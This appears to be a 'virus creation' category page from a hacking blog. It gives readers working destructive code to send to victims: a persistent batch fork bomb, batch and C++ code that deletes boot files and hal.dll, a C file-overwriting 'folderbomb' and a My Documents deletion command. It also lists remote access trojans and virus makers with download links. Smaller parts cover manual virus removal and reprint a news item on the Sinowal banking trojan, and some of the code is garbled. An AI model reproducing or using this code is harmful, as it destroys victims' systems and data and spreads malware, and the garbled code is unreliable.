Posts from the ‘virus creation’ Category

How to make damage to your friends PC

1. Open Notepad.
2. COPY and Paste the following Code  without quotes…..

“C:\Users\Owner\Desktop\clickme.bat” “C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”

start clickme.bat
clickme.bat


3. Save it as, “clickme.bat”
4. Send it to them over email or whatever.

What does this do? They will click on it, it will open multiple command prompt windows until the computer crashes. When they restart their computer, it will start again!

TIPS:
1. Make sure you tell them to save the file on the desktop .
2. Make sure they run Windows .

To Stop it:

 just open your windows in safe window and delete these two files

Code:

1. C:\Users\Owner\Desktop\clickme.bat

2. C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

dats it….   πŸ™‚

IF ANY DAMAGE DONE WE ARE NOT RESPONSIBLE for information purpose only……..

Shut down a PC FOREVER!!!!!!!!!!!!!

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


 

Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun …

REMEMBER – DO NOT CLICK THIS FILE.

YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!



DONOT TRY THIS ON UR PC…..!
 
 
If any data loss to your pc or other pc we are not responsible… try it your own risk…..
FOR EDUCATIONAL PURPOSE ONLY…

How to remove viruses manually without any antivirus softwares


Virus is just a program written to do some operations by running in the background process.

A virus first changes the registry values and it starts eating process of the system.
So registry back up is recommended regularly.U can back up registry from any of the registry cleaner softwares or registry back up softwares like CCleaner,backup registry,fix registry etc…

To remove the virus manually one should be aware of the process running in his system
u can use hijackthis to note down and check process running in background and even to disable them.
so download hijackthis and install

then if a virus is infected to the system follow these steps
check with the hijackthis remove the virus(or any suspicious programs) which is in the startup,So the virus program is removed
Then check ur hard drive further for any more suspicious programs or virus and remove those .exe files manually by shift+delete keys
Then check for registry editor,if it is disabled then do the following steps 1) Click Start, Run 2) Type GPEDIT.MSC and Press Enter 3) Go to the following location a)User Configuration b)Administrative Templates c)System 4) In the Settings Window, find the option for “Prevent Access to Registry Editing Tools” and double-click on it to change. 5) Select Disabled or Not Configured and choose OK 6) Close the Group Policy Editor and restart your computer 7) Try opening REGEDIT again
This enables ur registry editor from where u can enable task manager and show hidden files options etc….

Powerful C++ Virus

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your homecomputer.

The Original Code:

 

Code:
#include
#include

 

using namespace std;

 

int main(int argc, char *argv[])
{
std::remove(”C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code:

 

#include
#include

 

using namespace std;

 

int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Download all Trojans

These are the great Trojans to Download

 Spy-Net [RAT] v1.7

spy-net
Download :
http://www.4shared.com/file/90254050/3988d437/Spy-Net_RAT_v17.html
Password: Spy-Net
SHARETHIS.addEntry({ title: “Spy-Net [RAT] v1.7”, url: “http://blog.insecure.in/?p=357” });

Nuclear RAT 2.1.0

Nuclear Rat
* Programmed by: Caesar2k
* Date added / updated: September 4th 2007
* Downloads: 80685
* File size: 1.26MB
* Coded in: Delphi
* Section: Remote Administration Tools & Spy
* Compatibility: Windows NT, 2K, XP, Vista
Download :
http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/

Turkojan 4

Turkojan 4
Features :
* Reverse Connection
* Remote Desktop(very fast)
* Webcam Streaming(very fast)
* Audio Streaming
* Thumbnail viewer
* Remote passwords
* MSN Sniffer
* Remote Shell
* Web-Site Blocking
* Chat with server
* Send fake messages
* Advanced file manager
* Zipping files&folders
* Find files
* Change remote screen resolution
* Mouse manager
* Information about remote computer
* Clipboard manager
* IE options
* Running Process
* Service Manager
* Keyboard Manager
* Online keylogger
* Offline keylogger
* Fun Menu
* Registry manager
* Invisible in Searching Files/Regedit/Msconfig
* Small Server 100kb
Download :
http://www.4shared.com/file/72543880/bd92d968/TurkojaN_4.html
http://w14.easy-share.com/1702095672.html
SHARETHIS.addEntry({ title: “Turkojan 4”, url: “http://blog.insecure.in/?p=170” });

Trojan Virus Steals Banking Info

Hack News
The details of about 500,000 online bank accounts and credit and debit cards have been stolen by a virus described as β€œone of the most advanced pieces of crimeware ever created”.
The Sinowal trojan has been tracked by RSA, which helps to secure networks in Fortune 500 companies.
RSA said the trojan virus has infected computers all over the planet.
β€œThe effect has been really global with over 2000 domains

compromised,” said Sean Brady of RSA’s security division.
He told the BBC: β€œThis is a serious incident on a very noticeable scale and we have seen an increase in the number of trojans and their variants, particularly in the States and Canada.”
The RSA’s Fraud Action Research Lab said it first detected the Windows Sinowal trojan in Feb 2006.
Since then, Mr Brady said, more than 270,000 banking accounts and 240,000 credit and debit cards have been compromised from financial institutions in countries including the US, UK, Australia and Poland.
The lab said no Russian accounts were hit by Sinowal.
Source: BBC News
http://news.bbc.co.uk/2/hi/technology/7701227.stm
SHARETHIS.addEntry({ title: “Trojan Virus Steals Banking Info”, url: “http://blog.insecure.in/?p=144” });

TeraBIT Virus Maker 2.8 SE

TeraBIT Virus Maker 2.8 SE
(Backdoor.Win32.VB.bna)
Terabit Virusmaker
by m_reza00
Written in Visual Basic
Released in September 2007
Made in Iran
dropped files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon β€œShell”
Old data: Explorer.exe
New data: explorer.exe C:\WINDOWS\system32\csmm.exe
Tested on Windows XP
September 19, 2007
Download :
http://rapidshare.com/files/96994198/TeraBIT_VM_2_1.8.zip.html
SHARETHIS.addEntry({ title: “TeraBIT Virus Maker 2.8 SE”, url: “http://blog.insecure.in/?p=58” });

Demon-Ps 2.8

Demon-Ps 2.8
(Trojan-PSW.Win32.VB.us)
(Trojan-PSW.Win32.VB.va)
Demon-ps2.8
by Masoud Azimi
Written in Visual Basic
Released in August 2008
Made in Iran
Server
Dropped Files:
c:\WINDOWS\system32\love.exe Size: 81,920 bytes
c:\WINDOWS\system32\config\he.txt Size: 194 bytes
c:\WINDOWS\system32\config\sysrun.exe Size: 81,920 bytes
Added to Registry::
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run β€œ(Default)”
Data: C:\WINDOWS\system32\config\sysrun.exe -s
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon β€œShell”
Data: Explorer.exe C:\WINDOWS\system32\love.exe -s
Tested on Windows XP
August 21, 2008
Download :
http://rapidshare.com/files/127734369/Demon_Ps___2.8.zip
http://www.2shared.com/file/3532991/e70b602/Demon_Ps___28.html

A virus program in c for creating a folder virus

#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s β€œ, ffblk.ff_name);printf(”is attacked by β€œ);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Simple virus code

IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE’S WHAT U SHOULD DO
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Code Is Below
rmdir C:\Documents and Settings \S\Q.